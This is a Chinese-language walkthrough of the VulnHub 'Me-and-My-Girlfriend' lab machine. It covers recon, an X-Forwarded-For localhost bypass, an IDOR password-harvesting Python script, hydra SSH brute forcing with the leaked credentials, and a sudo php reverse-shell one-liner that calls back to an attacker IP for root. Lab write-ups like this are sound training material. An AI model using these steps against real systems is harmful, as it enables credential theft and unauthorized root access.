Me-and-My-Girlfriend靶场

靶机下载：

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

一、信息收集

查找ip

nmap -sP 192.168.16.0/24

获取详细端口等信息

 nmap -sV -sC -A -p 1-65535 192.168.16.209

目录扫描

gobuster   dir -u http://192.168.16.209  -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 

二、水平越权漏洞

访问网站，提示只能使用本地服务器访问

通过插件替换为127.0.01，在刷新访问

提示需要用x-forwarded-for头部

X-Forwarded-For（XFF）请求标头是一个事实上的用于标识通过代理服务器连接到 web 服务器的客户端的原始 IP 地址的标头。

下载插件：modhearder

添加头部信息点击转发重新刷新页面

web分析

可以看到有注册框

注册账号

登录

看到url后面有id值，尝试修改，测试有没有逻辑越权漏洞

可以看到列出了新的用户和隐藏的密码

点击显示密码

或者在

测试了一下有十三个用户

编写python脚本

通过模拟 HTTP 请求来访问一个网站的不同用户的 profile 页面，并从 HTML 中提取用户名和密码信息。

#coding:utf-8 
import requests

from bs4 import BeautifulSoup
#导入所需的库：requests 用于发送 HTTP 请求，BeautifulSoup 用于解析 HTML 内容

if __name__ == '__main__':

     for user_id in range(1, 13):
        url='http://192.168.16.209/index.php?page=profile&user_id='+ str(user_id)
        response = requests.get(url, headers={'X-Forwarded-For': '127.0.0.1', 'Cookie': 'PHPSESSID=fu0levanb4i9koc99b0n4vlst2'})
        #构建目标URL，使用 user_id 替换为循环变量的当前值，同时提供伪造的 X-Forwarded-For 和 Cookie 头部，以模拟请求。
        dom = BeautifulSoup(response.content.decode('UTF-8'))
        #使用 BeautifulSoup 对象来提取用户名和密码，dom.find('input', id='username')['value'] 用于找到带有指定ID属性的  元素，并获取其 value 属性。 
        username = dom.find('input', id='username')['value']
        passwd = dom.find('input', id='password')['value']
        
        if username:
            print(username + ":" + passwd)

最后得到：

eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
a:a

冒号分割格式可以用于hrdra爆破密码，保存为一个文件使用hydra尝试

三、ssh爆破

工具hydra

hydra -C 1.txt ssh://192.168.16.209 

 -C FILE   用冒号分隔的 "login:pass" 格式，代替 -L/-P 选项

得到可以账号：alice，密码：4lic3

登录

 ssh [email protected]

得到第一个flag

四、提权

查看当前用户的管理员权限

sudo -l

(root) NOPASSWD: /usr/bin/php

这意味着拥有此权限的用户（在此为 root 用户）可以在不输入密码的情况下执行 /usr/bin/php 命令，以 root 权限运行 PHP 解释器。

可以使用php反弹shell

执行：

sudo  php -r '$sock=fsockopen("192.168.16.180",8888);exec("/bin/sh -i <&3 >&3 2>&3");'


加上sudo执行，反弹的就是管理员用户了

反弹成功

得到第二个flag